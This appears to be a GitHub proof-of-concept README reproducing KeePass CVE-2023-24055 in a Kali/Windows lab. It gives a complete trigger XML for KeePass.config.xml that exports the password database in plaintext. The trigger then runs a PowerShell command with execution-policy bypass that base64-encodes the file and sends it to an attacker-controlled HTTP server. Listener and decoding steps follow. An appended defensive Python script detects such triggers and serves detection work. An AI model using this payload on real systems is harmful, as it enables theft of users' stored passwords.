CVE-2023-24055 PoC — KeePass Security Vulnerability

Source
Associated Vulnerability
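Title: KeePass Security Vulnerability (CVE-2023-24055)
Description: KeePass is an open-source password manager. KeePass 2.53 and earlier contain a security vulnerability. An attacker can exploit it to obtain plaintext passwords by adding an export trigger.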
Description
Reproduction of KeePass CVE-2023-24055
Readme
# KeePass-CVE-2023-24055
Reproduction of KeePass CVE-2023-24055


1. Prepare the machines: Kali (192.168.232.129), Windows 10 (192.168.232.128)

2. KeePass version: 2.53


![Image 1](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%871.png)


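2. Principle: modify the KeePass configuration file KeePass.config.xml to add a trigger entry that exports the passwords in plaintext and uploads them to the attacker's server. The XML for the trigger is as follows:

Here, the `<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>` field sets the local path to which the plaintext passwords are exported.


PowerShell is used to transfer the password file with a GET request: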

```
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
```


```
<Triggers>
	<Trigger>
		<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
		<Name>exploit</Name>
		<Events>
			<Event>
				<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
				<Parameters>
					<Parameter>0</Parameter>
					<Parameter />
				</Parameters>
			</Event>
		</Events>
		<Conditions />
		<Actions>
			<Action>
				<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
				<Parameters>
					<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
					<Parameter>KeePass XML (2.x)</Parameter>
					<Parameter />
					<Parameter />
				</Parameters>
			</Action>
			<Action>
				<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
				<Parameters>
					<Parameter>PowerShell.exe</Parameter>
					<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
					<Parameter>False</Parameter>
					<Parameter>1</Parameter>
					<Parameter />
				</Parameters>
			</Action>
		</Actions>
	</Trigger>
</Triggers>
```

3. Edit KeePass.config.xml, add the XML configuration and save it (insert it inside the `<TriggerSystem></TriggerSystem>` tags), then open KeePass to verify that the trigger was added:


![tu2](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%872.png)

4. On Kali, run `python3 -m http.server 8888` to start a web server that receives the exported plaintext passwords.

![tu3](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%873.png)

5. Open KeePass, create a new entry and save it; the trigger fires. Check what Kali received:

![tu4](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%874.png)


6. Copy the content to a file and decode it with Base64 to obtain the plaintext passwords.

![tu5](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%875.png)


![tu6](https://github.com/zwlsix/KeePass-CVE-2023-24055/blob/main/image/%E5%9B%BE%E7%89%876.png)
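
A defender-side check for the trigger shown above, as an added example that is not part of the original README: it parses the contents of a KeePass.config.xml and reports every trigger that contains the export or command-execution action GUIDs used on this page. The sample configuration, its trigger names, its placeholder values and the wrapping `<Configuration><Application>` elements are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Action TypeGuid values taken from the trigger shown on this page.
EXPORT_DB = "D5prW87VRr65NO2xP5RIIg=="  # action parameters: export path, export format
EXEC_CMD = "2uX4OwcwTBOe7y66y27kxw=="   # action parameters: program, arguments

# Constructed sample configuration (placeholder values, not a real config file).
SAMPLE_CONFIG = r"""<Configuration><Application><TriggerSystem><Triggers>
  <Trigger><Name>sample-export-and-run</Name><Actions>
    <Action><TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid><Parameters>
      <Parameter>C:\Temp\sample-export.xml</Parameter><Parameter>KeePass XML (2.x)</Parameter>
    </Parameters></Action>
    <Action><TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid><Parameters>
      <Parameter>placeholder.exe</Parameter><Parameter>--placeholder-args</Parameter>
    </Parameters></Action>
  </Actions></Trigger>
  <Trigger><Name>sample-other</Name><Actions>
    <Action><TypeGuid>AAAAAAAAAAAAAAAAAAAAAA==</TypeGuid><Parameters /></Action>
  </Actions></Trigger>
</Triggers></TriggerSystem></Application></Configuration>"""

def audit_triggers(config_xml: str) -> list:
    """Return one finding per trigger that exports the database or runs a command."""
    root = ET.fromstring(config_xml)
    findings = []
    for trig in root.iter("Trigger"):  # iter() finds triggers at any nesting depth
        exports, commands = [], []
        for action in trig.iter("Action"):
            guid = (action.findtext("TypeGuid") or "").strip()
            params = [(p.text or "").strip() for p in action.iter("Parameter")]
            if guid == EXPORT_DB:
                exports.append({"path": params[0] if params else "",
                                "format": params[1] if len(params) > 1 else ""})
            elif guid == EXEC_CMD:
                commands.append(" ".join(params[:2]).strip())
        if exports or commands:
            findings.append({
                "name": (trig.findtext("Name") or "").strip(),
                "exports": exports,
                "commands": commands,
                # Export plus command execution in one trigger is the pattern on this page.
                "severity": "high" if exports and commands else "review",
            })
    return findings

if __name__ == "__main__":
    for finding in audit_triggers(SAMPLE_CONFIG):
        print(finding)
```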
   









References: https://github.com/alt3kx/CVE-2023-24055_PoC

https://www.youtube.com/watch?v=tqK1bns51ek



















File Snapshot

```
[4.0K] /data/pocs/e20d04e9f387cf79d60c0436c20675a8a8e81928
├── [4.0K] image
│   ├── [ 21K] 图片1.png
│   ├── [ 17K] 图片2.png
│   ├── [6.2K] 图片3.png
│   ├── [187K] 图片4.png
│   ├── [3.7K] 图片5.png
│   └── [ 37K] 图片6.png
└── [3.1K] README.md

1 directory, 7 files
```